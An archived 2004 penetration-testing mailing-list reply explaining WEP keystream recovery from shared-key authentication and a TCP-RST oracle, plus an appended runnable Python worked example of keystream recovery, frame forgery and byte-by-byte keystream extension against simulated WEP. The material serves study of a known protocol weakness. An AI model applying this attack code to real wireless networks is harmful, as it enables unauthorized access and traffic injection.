Penetration Testing mailing list archives
Re: WEP attacks based on IV Collisions
From: leonardo <billtorvalds1 () yahoo it>
Date: Wed, 2 Jun 2004 21:50:41 +0200
* Wednesday 02 June 2004, at 08:09, Jeremy Junginger wrote:
> But before I can even think about the key, I need to figure out how to identify these encrypted DHCP? Anyone know?
If you have enough time to arrange this attack, you just have to wait for a new machine to authenticate (or force any machine to deauthenticate and wait for it to authenticate again). Authentication in WEP works, quite surprisingly, like this: the AP sends a challenge text in the clear (128 bit), the supplicant answers with the same challenge text encrypted with the WEP key, and the AP checks the correctness of the encryption and authenticates the client. So if you listen to an authentication, you see 128 bit passing in plaintext and encrypted, and you can get those 128 bit of keystream.
> 1) Generate an 8 byte (n-3) message that generates a predictable response (8 byte ICMP packet? What shall we use here?)
You don't really need a predictable packet: if you send a TCP ACK to a closed port of any host, you'll get a RST if your forged packet was correctly checksummed, otherwise nothing. So if you get a response, you got the right byte.

ciao,
leonardo.

--
0C5F B8DE 3136 1506 96D0 1806 7674 D513 A66E 7854
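The two steps leonardo describes, keystream recovery from the shared-key authentication exchange and the byte-at-a-time extension of that keystream using the AP's ICV check as an oracle, as an added worked example that is not part of the thread. RC4 and the WEP frame format (3-byte IV, CRC-32 ICV, RC4 keyed with IV||key) are implemented inline so it runs offline; the WEP key, IV and challenge bytes are constructed values, and the challenge is 128 octets, the length the 802.11 shared-key exchange uses. The `accepted()` callback stands in for "did the closed-port TCP ACK draw a RST", which in the simulation is simply whether the AP's ICV check passes.

```python
"""Toy WEP: keystream recovery from a shared-key authentication exchange,
keystream reuse to forge a frame, and byte-at-a-time keystream extension
using the AP's ICV check as an oracle. Added example, not code from the thread."""
import struct
import zlib

# Constructed example values (not from the thread): a 40-bit WEP key and one IV.
WEP_KEY = bytes.fromhex("0102030405")
IV = bytes.fromhex("aabbcc")


def rc4(key: bytes, length: int) -> bytes:
    """Return `length` bytes of RC4 keystream for `key` (KSA + PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data: bytes) -> bytes:
    """WEP integrity check value: CRC-32 of the plaintext, little-endian."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(iv: bytes, data: bytes, key: bytes = WEP_KEY) -> bytes:
    """Frame body = IV || (data || ICV) XOR RC4(IV || key)."""
    pt = data + icv(data)
    return iv + xor(pt, rc4(iv + key, len(pt)))


def wep_decrypt(frame: bytes, key: bytes = WEP_KEY):
    """What the AP does: strip the IV, decrypt, verify the ICV.
    None models a frame that is silently dropped."""
    iv, body = frame[:3], frame[3:]
    pt = xor(body, rc4(iv + key, len(body)))
    data, tag = pt[:-4], pt[-4:]
    return data if icv(data) == tag else None


# Step 1: the shared-key authentication exchange leaks keystream.
def recover_keystream(challenge: bytes, response_frame: bytes):
    """Plaintext challenge XOR the encrypted response gives len(challenge)+4
    bytes of keystream for the IV the station chose."""
    iv, body = response_frame[:3], response_frame[3:]
    return iv, xor(challenge + icv(challenge), body)


# Step 2: reuse that keystream, under the same IV, to inject any shorter frame.
def forge_frame(iv: bytes, keystream: bytes, data: bytes) -> bytes:
    pt = data + icv(data)
    if len(pt) > len(keystream):
        raise ValueError("need more keystream than we have for this IV")
    return iv + xor(pt, keystream[: len(pt)])


# Step 3: extend known keystream one byte at a time via the ICV oracle.
def extend_keystream(iv: bytes, keystream: bytes, accepted) -> bytes:
    """With n keystream bytes, send an (n-3)-byte payload so payload||ICV is
    n+1 bytes; encrypt the first n bytes correctly and guess the last keystream
    byte. Only the right guess yields a valid ICV, so only that frame gets
    through the AP (and, in the real attack, draws a RST from the target host)."""
    n = len(keystream)
    payload = bytes(n - 3)  # constructed stand-in for the TCP-ACK probe packet
    pt = payload + icv(payload)  # n + 1 bytes
    head = xor(pt[:n], keystream)
    for guess in range(256):
        if accepted(iv + head + bytes([pt[n] ^ guess])):
            return keystream + bytes([guess])
    raise RuntimeError("no guess accepted; the known keystream prefix is wrong")


def demo():
    challenge = bytes(range(128))  # constructed; 802.11 uses a 128-octet challenge
    response = wep_encrypt(IV, challenge)  # the station's encrypted reply
    iv, ks = recover_keystream(challenge, response)
    forged = forge_frame(iv, ks, b"injected without knowing the key")
    ks_plus_one = extend_keystream(iv, ks, lambda f: wep_decrypt(f) is not None)
    return ks, wep_decrypt(forged), ks_plus_one


if __name__ == "__main__":
    ks, decrypted, ks_plus_one = demo()
    print(len(ks), decrypted, len(ks_plus_one))
```

Each extension step costs at most 256 probe frames for one more byte of keystream under that IV; once the keystream is long enough for a full packet, the same IV can be reused indefinitely because WEP never rejects a repeated IV.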
Current thread:
- RE: WEP attacks based on IV Collisions Jeremy Junginger (Jun 02)
- Re: WEP attacks based on IV Collisions leonardo (Jun 02)
- <Possible follow-ups>
- RE: WEP attacks based on IV Collisions pen-test (Jun 04)
- RE: WEP attacks based on IV Collisions pen-test (Jun 04)
- Re: WEP attacks based on IV Collisions leonardo (Jun 07)
- Re: WEP attacks based on IV Collisions Andrew A. Vladimirov (Jun 11)
- Re: WEP attacks based on IV Collisions leonardo (Jun 07)